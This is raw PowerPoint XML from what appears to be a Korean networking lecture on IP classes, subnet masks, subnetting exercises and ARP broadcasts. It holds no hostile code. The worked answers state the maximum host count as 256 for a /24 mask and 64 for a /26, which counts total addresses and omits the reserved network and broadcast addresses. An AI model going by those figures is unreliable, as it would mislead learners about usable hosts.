            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8219456" y="1927775"/>
            <a:ext cx="2439575" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
            <a:prstDash val="dash"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:latin typeface="Apple SD Gothic Neo"/>
              </a:rPr>
              <a:t>Ipconfig /all</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="340143910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IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>클래스</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IP Address">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8B00CFD-BE98-4D01-AF03-6715B8E0BA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980" y="2105689"/>
            <a:ext cx="6505575" cy="39909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7A01500-5784-455E-AE6F-3C51E4AB2D08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7835984" y="2105689"/>
            <a:ext cx="4066755" cy="4202112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>Q) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>192.12.100.130</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>클래스</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>네트워</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>크 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>IP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>호스트 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>IP,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>기본 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>서브넷</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t> 마스크는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5C5C5C"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Spoqa Han Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5C5C5C"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Spoqa Han Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>클래스 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>: C</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>네트워크 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>: 192.12.100.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>호스트 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>: 130</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>기본 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>서브넷</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t> 마스크 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>: 255.255.255.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5C5C5C"/>
              </a:solidFill>
              <a:latin typeface="Spoqa Han Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>Net Address bit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>더 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>확장</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>할 수 있음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Spoqa Han Sans"/>
              </a:rPr>
              <a:t>      =&gt; Subnetting</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="47238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err="1"/>
              <a:t>서브넷팅</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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C75DCD4F-E78D-4504-B4AC-E2BCAC6F5CE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1441239" y="2040747"/>
            <a:ext cx="9713229" cy="4339650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>Net Address = IP &amp; Subnet Mask</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>Q) Net Address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
              <a:t>를 구하고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
              <a:t>최대 수용 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
              <a:t>수를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>구하시오</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>192.12.100.130</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Subnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Mask:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>255.255.255.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>A) Net Address : 192.12.100.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>최대 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>수 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>: 256 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>개</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>Q) Net Address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
              <a:t>를 구하고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
              <a:t>최대 수용 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
              <a:t>수를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>구하시오</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>192.12.100.130</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Subnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Mask:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>255.255.255.192</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>A) Net Address : 192.12.100.128</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>최대 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>수 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>: 64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>개</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="209633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a:t>네트워크 데모</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실행 단추: 문서 15">
            <a:hlinkClick r:id="rId4" action="ppaction://hlinkfile"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50AF5B17-E3DF-4964-9197-E3A1CA0B9E7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8965031" y="3379218"/>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 name="그림 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{054B7672-067F-4DE5-BCAE-A7F82D0B1A1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1855305" y="1788286"/>
            <a:ext cx="5227070" cy="4413729"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="233779951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ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>테이블</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6AD25E02-9DAF-4842-AD13-D542569E9DD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1663148" y="3721574"/>
            <a:ext cx="8402914" cy="3139321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>네트워크에 있는 분들</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>?? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>혹시 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>22.87.132.42</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>님 계시나요</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>같은 네트워크에 있는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>PC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>들에게 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>ARP Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>BroadCast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>BroadCast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>란</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
